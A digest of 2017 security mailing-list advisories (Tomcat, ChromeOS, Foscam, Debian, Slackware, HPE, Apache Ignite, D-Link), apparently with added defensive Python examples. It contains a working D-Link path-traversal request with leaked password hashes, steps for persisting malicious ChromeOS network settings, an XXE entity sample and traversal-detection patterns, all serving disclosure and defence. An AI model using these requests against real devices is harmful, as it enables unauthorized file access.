[SECURITY] CVE-2017-5648 Apache Tomcat Information Disclosure

2017-04-10 Thread Mark Thomas
CVE-2017-5648 Apache Tomcat Information Disclosure

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
Apache Tomcat 9.0.0.M1 to 9.0.0.M17
Apache Tomcat 8.5.0 to 8.5.11
Apache Tomcat 8.0.0.RC1 to 8.0.41
Apache Tomcat 7.0.0 to 7.0.75
Apache Tomcat 6.0.x is not affected

Description
While investigating bug 60718, it was noticed that some calls to
application listeners did not use the appropriate facade object. When
running an untrusted application under a SecurityManager, it was
therefore possible for that untrusted application to retain a reference
to the request or response object and thereby access and/or modify
information associated with another web application.

Mitigation:
Users of the affected versions should apply one of the following
mitigations:
- Upgrade to Apache Tomcat 9.0.0.M18 or later
- Upgrade to Apache Tomcat 8.5.12 or later
- Upgrade to Apache Tomcat 8.0.42 or later
- Upgrade to Apache Tomcat 7.0.76 or later

Credit:
This issue was identified by the Tomcat security team.

History:
2017-04-10 Original advisory

References:
[1] https://bz.apache.org/bugzilla/show_bug.cgi?id=60718
[2] http://tomcat.apache.org/security-9.html
[3] http://tomcat.apache.org/security-8.html
[4] http://tomcat.apache.org/security-7.html
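The facade mechanism the description above refers to, as an added illustration in Python (not Tomcat's own Java code): a pooled request object is recycled between requests, and a listener handed the raw object instead of a facade keeps a usable reference into the next request. `Request`, `RequestFacade`, `serve` and `leaked_value` are hypothetical names chosen for this example.

```python
"""Added illustration (not Tomcat code, which is Java): why listeners must be
handed a facade. A pooled Request is recycled between requests; a listener
given the raw object keeps a usable reference into the next request, while
a listener given the facade is cut off once the container clears it.
"""


class Request:
    """Stand-in for the container's pooled, internal request object."""

    def __init__(self):
        self.attributes = {}

    def recycle(self):
        # The pooled object is wiped and reused for the next request, which
        # may belong to a different web application.
        self.attributes = {}


class RequestFacade:
    """Thin wrapper handed to application code; clear() severs the link."""

    def __init__(self, request):
        self._request = request

    def clear(self):
        self._request = None

    def get_attribute(self, name):
        if self._request is None:
            raise RuntimeError("request facade has been recycled")
        return self._request.attributes.get(name)


def serve(request, listener_store, use_facade):
    """Process one request: notify the listener (which stashes whatever
    object it is given), then recycle the request."""
    handed_out = RequestFacade(request) if use_facade else request
    listener_store.append(handed_out)     # the untrusted listener keeps it
    if use_facade:
        handed_out.clear()                # container invalidates the facade
    request.recycle()


def leaked_value(use_facade):
    """App A's listener retains a reference; app B's request then reuses the
    pooled object. Return what app A can read of app B's data, or None."""
    pooled = Request()
    retained = []
    pooled.attributes["secret"] = "app-A-data"
    serve(pooled, retained, use_facade)
    pooled.attributes["secret"] = "app-B-data"   # next request, app B
    ref = retained[0]
    try:
        if use_facade:
            return ref.get_attribute("secret")
        return ref.attributes.get("secret")
    except RuntimeError:
        return None
```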



[SECURITY] CVE-2017-5651 Apache Tomcat Information Disclosure

2017-04-10 Thread Mark Thomas
CVE-2017-5651 Apache Tomcat Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Apache Tomcat 9.0.0.M1 to 9.0.0.M18
Apache Tomcat 8.5.0 to 8.5.12
Apache Tomcat 8.0.x and earlier are not affected

Description:
The refactoring of the HTTP connectors for 8.5.x onwards introduced a
regression in the send file processing. If the send file processing
completed quickly, it was possible for the Processor to be added to the
processor cache twice. This could result in the same Processor being
used for multiple requests, which in turn could lead to unexpected errors
and/or response mix-up.

Mitigation:
Users of the affected versions should apply one of the following
mitigations:
- Upgrade to Apache Tomcat 9.0.0.M19 or later
- Upgrade to Apache Tomcat 8.5.13 or later

Credit:
This issue was reported publicly as Bug 60918 [1] and the security
implications identified by the Tomcat security team.

History:
2017-04-10 Original advisory

References:
[1] https://bz.apache.org/bugzilla/show_bug.cgi?id=60918
[2] http://tomcat.apache.org/security-9.html
[3] http://tomcat.apache.org/security-8.html
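The double release described above, as an added illustration in Python (not Tomcat's own Java code): a free-list that tracks its members by identity reports the second push instead of creating a duplicate entry, so two later requests cannot be handed the same processor. `ProcessorCache`, `sendfile_completion` and the other names are hypothetical.

```python
"""Added illustration (not Tomcat code, which is Java): a processor cache that
detects the double release described above. When a Processor is returned to
the cache twice, two later requests can pop the same object and share state.
"""


class Processor:
    def __init__(self, ident):
        self.ident = ident


class ProcessorCache:
    """LIFO free-list that tracks members by identity so a second push of
    the same object is reported instead of creating a duplicate entry."""

    def __init__(self, guarded=True):
        self.guarded = guarded            # guarded=False models the regression
        self._stack = []
        self._members = set()

    def push(self, proc):
        """Return True if cached, False if it was already in the cache."""
        if id(proc) in self._members and self.guarded:
            return False                  # double release: caller's bug
        self._members.add(id(proc))
        self._stack.append(proc)
        return True

    def pop(self):
        if not self._stack:
            return None
        proc = self._stack.pop()
        if proc not in self._stack:       # default __eq__ is identity
            self._members.discard(id(proc))
        return proc


def sendfile_completion(cache, proc):
    """Model the regression: the sendfile path and the normal completion
    path both release the same processor. Returns both push results."""
    first = cache.push(proc)
    second = cache.push(proc)
    return first, second


def next_two_requests_get_distinct_processors(guarded):
    cache = ProcessorCache(guarded)
    sendfile_completion(cache, Processor("P1"))
    a = cache.pop()
    b = cache.pop()
    return b is None or a is not b
```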



DefenseCode ThunderScan SAST Advisory: WordPress Tribulant Slideshow Gallery Plugin - Cross-Site Scripting Vulnerabilities

2017-04-10 Thread DefenseCode

DefenseCode ThunderScan SAST Advisory
WordPress Tribulant Slideshow Gallery Plugin - Cross-Site Scripting Vulnerabilities


Advisory ID: DC-2017-01-014
Software: WordPress Tribulant Slideshow Gallery plugin
Software Language: PHP
Version: 1.6.4 and below
Vendor Status: Vendor contacted, fix released
Release Date: 20170410
Risk: Medium


Full advisory available on the following URL:
http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf


# About DefenseCode

DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security Testing,
WhiteBox Testing) solution for performing extensive security audits of
application source code.
ThunderScan performs fast and accurate analyses of large and complex
source code projects, delivering precise results and a low false positive
rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing,
BlackBox Testing) solution for comprehensive security audits of active
web applications.
WebScanner will test a website's security by carrying out a large number
of attacks using the most advanced techniques, just as a real attacker
would.

Subscribe for free software trial on our website
http://www.defensecode.com/

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com/
Twitter: https://twitter.com/DefenseCode/



ChromeOS / ChromeBooks Persist Certain Network Settings in Guest Mode

2017-04-10 Thread Nightwatch Cybersecurity Research
[Original post can be found here:
https://wwws.nightwatchcybersecurity.com/2017/04/09/advisory-chromeos-chromebooks-persist-certain-network-settings-in-guest-mode/]

SUMMARY

Certain network settings in ChromeOS / ChromeBooks persist between
reboots when set in guest mode. These issues have been reported to the
vendor but will not be fixed since the vendor considers them to be WAI
(Working As Intended). These attacks require physical access to the
device in order to execute them, but future avenues of research looking
at network vectors should be undertaken.

BACKGROUND

ChromeOS is the operating system developed by Google that runs on
ChromeBook devices. It is built on top of Linux and around the Chrome
browser. The OS has a guest mode which runs Chrome in anonymous mode
on top of a temporary guest account. The data within that account is
stored in RAM and is erased upon reboot. However, it appears from our
research that some settings, especially network related ones, reside
elsewhere and do persist between reboots.

Our original interest in this area was prompted by a standing $100,000
USD bounty offered by Google to an exploit “that can compromise a
Chromebook or Chromebox with device persistence in guest mode (i.e.
guest to guest persistence with interim reboot, delivered via a web
page)”. While we have not been able to deliver these attacks via a web
page, we did achieve some persistence in network settings in guest
mode via physical access. Further research is needed to achieve remote
exploitation.

DETAILS

The following network settings were observed in guest mode as
persisting between reboots if the change is made by a guest user while
the Chromebook is in guest mode:

- Details of WiFi network such as password, authentication, etc.
- Preferred WiFi network
- DNS settings on the currently connected WiFi network

To replicate, do the following:

1. Login as a guest into the Chromebook.
2. Click on settings, and:

- Try to remove a WiFi network and add a new preferred network;
- Or change settings for an existing network;
- Or change DNS servers for an existing network

3. Reboot, re-enter guest mode and observe settings persisting

The following settings only persist when changes are made on the login
screen. If a user logs in as a guest user or a Google account, this
goes away:

PROXY SETTINGS

To replicate:

1. Start the Chromebook until Login prompt appears. DO NOT login.
2. Click on settings, change the proxy settings in the current network.
3. Reboot and go back to the login screen, confirm settings for proxy
do persist.
4. Log in to an existing account or as a guest, check the settings again
and observe that the proxy settings are now greyed out.

Implications of this are most important in scenarios where a shared
Chromebook is used in a public environment such as a library, school,
etc. Using these attacks, a malicious user can modify the settings on
a public ChromeBook to point to malicious DNS (like DNS Changer virus)
or malicious WiFi hotspot, and subsequent users will not realize that
their sessions are affected.

We have not been able to achieve remote exploitation, but an existing
private Chrome API (chrome.networkingPrivate) would provide access to
these settings even in guest mode. This API is not normally available
via the Web, so an additional browser exploit would need to be chained
to the issues described here to achieve a complete exploit. Another
thing to note is that while guest mode normally runs under a RAM disk
which is erased after the device is rebooted, the network settings
appear to reside elsewhere within the device. That can be used as a
further area of possible attacks.

All testing was done in 2016 on the following system, and it is not
clear if other ChromeBook hardware is affected:

Device: Acer C7 Chromebook
Chrome Versions: 49.0.2623.95, 49.0.2623.111 and 51.0.2704.106 (stable)
ChromeOS Versions: 7834.60.0, 7834.66.0 and 8172.62.0 (stable parrot)

VENDOR RESPONSE

The vendor has rejected all of these issues as WAI – working as
intended. The vendor has provided the following explanation:

First of all, note that there are quite a few ways for network
settings to propagate into sessions. DNS and proxy (per issue 627299)
settings are just two of them. You can go further and just join the
device to a malicious WiFi network that it’ll pick up again after
rebooting (this is possible from the login screen, no need to start a
guest session). Edit: There are more issues filed for these cases, cf.
issue 600194 and issue 595563.

If we were to crack down on propagation of (malicious) network
settings into sessions, we’d take quite a UX hit, as we’d have to
prompt the user to reconfirm their network settings whenever the
device is connected to a network that user hasn’t yet approved (and
it’s quite unlikely for this to be effective). The alternative of only
allowing the device owner to configure networks doesn’t fly either as
it has the potential to lock out legitimate users.

Regardi

Foscam All networked devices, multiple Design Errors. SSL bypass.

2017-04-10 Thread nick . m . mckenna
Two issues in one that nullify SSL in Foscam devices:
All Foscam networked cameras use the same SSL private key, which is hard coded
into the downloadable firmware. This is easily extracted using a utility like
binwalk and would allow an attacker to MITM any Foscam device.
One device's SSL keys are valid for any other device. See the CNs of the
certificates below: *.myfoscam.org

Below are the ssl certificates of two foscam devices.

openssl s_client -connect [REDACTED]myfoscam.org:443

CONNECTED(0003)
depth=0 C = CN, ST = Guangdong, L = Shenzhen, O = "Shenzhen Foscam Intelligent 
Technology Co,Ltd", CN = *.myfoscam.org
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = CN, ST = Guangdong, L = Shenzhen, O = "Shenzhen Foscam Intelligent 
Technology Co,Ltd", CN = *.myfoscam.org
verify error:num=21:unable to verify the first certificate
verify return:1
---
Certificate chain
 0 s:/C=CN/ST=Guangdong/L=Shenzhen/O=Shenzhen Foscam Intelligent Technology 
Co,Ltd/CN=*.myfoscam.org
   i:/C=CN/O=WoSign CA Limited/CN=WoSign Class 3 OV Server CA
---
Server certificate
subject=/C=CN/ST=Guangdong/L=Shenzhen/O=Shenzhen Foscam Intelligent Technology 
Co,Ltd/CN=*.myfoscam.org
issuer=/C=CN/O=WoSign CA Limited/CN=WoSign Class 3 OV Server CA

openssl s_client -connect [REDACTED]myfoscam.org:443


CONNECTED(0003)

depth=0 C = CN, ST = Guangdong, L = Shenzhen, O = "Shenzhen Foscam Intelligent 
Technology Co,Ltd", CN = *.myfoscam.org
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = CN, ST = Guangdong, L = Shenzhen, O = "Shenzhen Foscam Intelligent 
Technology Co,Ltd", CN = *.myfoscam.org
verify error:num=21:unable to verify the first certificate
verify return:1
---
Certificate chain
 0 s:/C=CN/ST=Guangdong/L=Shenzhen/O=Shenzhen Foscam Intelligent Technology 
Co,Ltd/CN=*.myfoscam.org
   i:/C=CN/O=WoSign CA Limited/CN=WoSign Class 3 OV Server CA
---
Server certificate
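One way to check a fleet for the shared-certificate condition the post describes, as an added example that is not part of the original post: capture each device's certificate with `openssl s_client` as above, then group devices by certificate fingerprint. It uses only the Python standard library, so it hashes the whole DER certificate (as `openssl x509 -fingerprint -sha256` does) rather than extracting the public key; an identical fingerprint proves a shared key, while devices with different certificates but the same key would need a public-key comparison. `SAMPLE_CERTS` and `_fake_pem` are constructed stand-ins, not real X.509 data.

```python
"""Added example (not from the original post): flag devices that present the
same TLS certificate. Input is a mapping of device name -> PEM certificate as
captured with `openssl s_client`; a shared certificate means a shared private
key, so a key extracted from one device's firmware works against all of them.
Only the standard library is used, so the PEM is hashed as a whole rather than
parsed for its public key.
"""
import base64
import hashlib
import ssl
from collections import defaultdict


def fingerprint(pem):
    """SHA-256 over the DER certificate, as `openssl x509 -fingerprint` does."""
    der = ssl.PEM_cert_to_DER_cert(pem)
    return hashlib.sha256(der).hexdigest()


def shared_certificates(certs_by_device):
    """Group devices by certificate fingerprint; return only the groups
    with more than one member, i.e. devices that share a private key."""
    groups = defaultdict(list)
    for device, pem in certs_by_device.items():
        groups[fingerprint(pem)].append(device)
    return {fp: sorted(devs) for fp, devs in groups.items() if len(devs) > 1}


def _fake_pem(der_bytes):
    """Constructed stand-in for a captured certificate (not real X.509 DER);
    PEM_cert_to_DER_cert only strips the armour and base64-decodes."""
    body = base64.encodebytes(der_bytes).decode()
    return "-----BEGIN CERTIFICATE-----\n" + body + "-----END CERTIFICATE-----\n"


# Constructed sample: three cameras, two of which ship the same certificate.
SAMPLE_CERTS = {
    "camera-A": _fake_pem(b"shared-foscam-cert"),
    "camera-B": _fake_pem(b"shared-foscam-cert"),
    "camera-C": _fake_pem(b"per-device-cert"),
}


if __name__ == "__main__":
    for fp, devices in shared_certificates(SAMPLE_CERTS).items():
        print(f"{fp[:16]}... shared by {', '.join(devices)}")
```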



[slackware-security] libtiff (SSA:2017-098-01)

2017-04-10 Thread Slackware Security Team


[slackware-security]  libtiff (SSA:2017-098-01)

New libtiff packages are available for Slackware 14.2 and -current to
fix security issues.


Here are the details from the Slackware 14.2 ChangeLog:
+--+
patches/packages/libtiff-4.0.7-i586-1_slack14.2.txz:  Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9448
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libtiff-4.0.7-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libtiff-4.0.7-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libtiff-4.0.7-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libtiff-4.0.7-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.2 package:
a0b2f84a88036a4e8e01165d522fdf09  libtiff-4.0.7-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
fccecb6c9e1eea06607442bd6b58e63f  libtiff-4.0.7-x86_64-1_slack14.2.txz

Slackware -current package:
a1699ec0db14b6563390f78f9c9bee8e  l/libtiff-4.0.7-i586-1.txz

Slackware x86_64 -current package:
9e5280389d6fc4a80fb0c42a026a942c  l/libtiff-4.0.7-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg libtiff-4.0.7-i586-1_slack14.2.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com



[SECURITY] [DSA 3827-1] jasper security update

2017-04-10 Thread Moritz Muehlenhoff

- -
Debian Security Advisory DSA-3827-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
April 07, 2017https://www.debian.org/security/faq
- -

Package: jasper
CVE ID : CVE-2016-9591 CVE-2016-10249 CVE-2016-10251

Multiple vulnerabilities have been discovered in the JasPer library for
processing JPEG-2000 images, which may result in denial of service or
the execution of arbitrary code if a malformed image is processed.

For the stable distribution (jessie), these problems have been fixed in
version 1.900.1-debian1-2.4+deb8u3.

We recommend that you upgrade your jasper packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[security bulletin] HPESBGN03733 rev.1 - HPE Universal CMDB using Apache Struts, Remote Code Execution

2017-04-10 Thread security-alert

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbgn03733en_us
Version: 1

HPESBGN03733 rev.1 - HPE Universal CMDB using Apache Struts, Remote Code
Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2017-04-07
Last Updated: 2017-04-07

Potential Security Impact: Remote: Code Execution

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability in Jakarta Multipart parser in Apache
Struts has been addressed in HPE Universal CMDB. This vulnerability could be
remotely exploited to allow code execution via mishandled file upload.

References:

  - CVE-2017-5638 - Vulnerability in Apache Struts 2, Remote Code Execution

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HP Universal CMDB Foundation Software - v10.22 CUP5

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2017-5638
  10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following mitigation information available to resolve the
vulnerability for the impacted versions of HPE Universal CMDB.

*


HISTORY
Version:1 (rev.1) - 7 April 2017 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.


[CVE-2016-6805] Arbitrary File Read due to eXternal Xml Entity attack in Apache Ignite

2017-04-10 Thread Denis Magda
[CVE-2016-6805] Arbitrary File Read due to eXternal Xml Entity attack in Apache 
Ignite

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected: Apache Ignite 1.0.0-RC3 to 1.8

Description:
Apache Ignite uses an update notifier component to inform users about new 
project releases that include additional functionality, bug fixes and 
performance improvements. To do that, the component communicates with an external 
PHP server (http://ignite.run) to which it needs to send some system properties 
such as the Apache Ignite or Java version. This feature is enabled by default and, 
by mistake, used to send sensitive data over HTTP, such as installation folders or 
environment variables stored in Java system properties. The second issue is 
that, because TLS is not used between the application and the PHP server, a 
man-in-the-middle attack is possible and a malicious actor could alter the 
response coming from the ignite.run server. This response is parsed by the 
Apache Ignite component as XML, and an XXE attack can be triggered.

Both issues mentioned above were fixed as a part of Apache Ignite 1.9 release. 
The relevant commits with the changes:

Mitigation:
Users must upgrade to Apache Ignite 1.9 or later versions or disable the update 
notifier.

Credit:
Pierre Ernst, Salesforce
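The XML half of the fix above, as an added example in Python (Ignite's own fix is in Java and is not shown here): an update-notifier response received over an untrusted channel is parsed with a parser that refuses any DOCTYPE or entity declaration, so injected external entities are never declared, let alone resolved. `parse_update_response`, `UnsafeXml` and the two sample documents are constructed for this example; the hostile sample uses a placeholder file path.

```python
"""Added example (not Ignite's code): parse an update-notifier response as
untrusted XML. The parser refuses any DOCTYPE or entity declaration, which
is what closes the XXE path; built on xml.parsers.expat from the stdlib.
"""
import xml.parsers.expat


class UnsafeXml(ValueError):
    """Raised when the document tries to declare a DOCTYPE or entities."""


def parse_update_response(data):
    """Return {tag: text} for the direct children of the root element, or
    raise UnsafeXml. `data` is the raw bytes received from the update server."""
    fields = {}
    stack = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml("DOCTYPE not allowed in update response")

    def entity_decl(*args):
        raise UnsafeXml("entity declarations not allowed")

    def external_entity_ref(context, base, sysid, pubid):
        return 0                       # never fetch external entities

    def start_element(name, attrs):
        stack.append(name)

    def end_element(name):
        stack.pop()

    def char_data(text):
        if len(stack) == 2:            # text of a direct child of the root
            fields[stack[-1]] = fields.get(stack[-1], "") + text

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(data, True)           # handler exceptions propagate here
    return fields


# Constructed samples: a benign response and one carrying an external entity.
BENIGN = (b"<update><version>1.9.0</version>"
          b"<url>https://example.invalid/release</url></update>")
HOSTILE = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE update [<!ENTITY leak SYSTEM "file:///placeholder/path">]>'
           b"<update><version>&leak;</version></update>")


def is_accepted(data):
    """True if the response parses under the hardened rules."""
    try:
        parse_update_response(data)
        return True
    except UnsafeXml:
        return False
```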






D-Link DWR-116 - CVE-2017-6190 - Arbitrary File Download

2017-04-10 Thread patrykgnt
# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)

Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from a vulnerability
which leads to unauthorized file download from the device filesystem.


PoC:

HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; 
Trident/5.0)
Connection: close

HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close

root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin


Fix:
Update device to the new firmware (V1.05b09)
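The server-side check that the request above defeats, plus a log check for the same pattern, as an added example in Python (not D-Link's firmware code). It assumes a file handler that maps request paths under a single web root (`WEB_ROOT` is a hypothetical value) and goes beyond the plain `../` in the PoC by percent-decoding before normalising, so encoded variants such as `%2e%2e` are handled too; `SAMPLE_LOG` is constructed.

```python
"""Added example (not D-Link's code): reject request paths that escape the
web root, and flag traversal attempts in access-log lines."""
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/www"                      # hypothetical web root for the example


def safe_resolve(web_root, request_path):
    """Map a request path to a filesystem path inside web_root, or return
    None when the normalised path would escape the root."""
    decoded = unquote(unquote(request_path))       # also covers double encoding
    if "\x00" in decoded:
        return None
    # Join under the root, then collapse "." and ".." with POSIX rules.
    candidate = posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))
    root = web_root.rstrip("/")
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None                        # e.g. /uir/../../etc/passwd -> /etc/passwd


# Raw or percent-encoded "../" (either dot may be encoded).
TRAVERSAL_RE = re.compile(r"(?:\.|%2e){2}[/\\]", re.IGNORECASE)
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def traversal_attempts(log_lines):
    """Return (client, path) for common-log-format lines whose request path
    contains a traversal sequence, raw or percent-encoded."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path = m.groups()
        if TRAVERSAL_RE.search(path) or TRAVERSAL_RE.search(unquote(path)):
            hits.append((client, path))
    return hits


# Constructed access-log sample: one benign fetch, two traversal attempts.
SAMPLE_LOG = [
    '192.168.2.10 - - [01/Jan/2017:10:00:01 +0000] "GET /uir/logo.png HTTP/1.1" 200 512',
    '192.168.2.10 - - [01/Jan/2017:10:00:02 +0000] '
    '"GET /uir/../../../../../../etc/passwd HTTP/1.1" 200 210',
    '192.168.2.11 - - [01/Jan/2017:10:00:03 +0000] '
    '"GET /uir/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0',
]
```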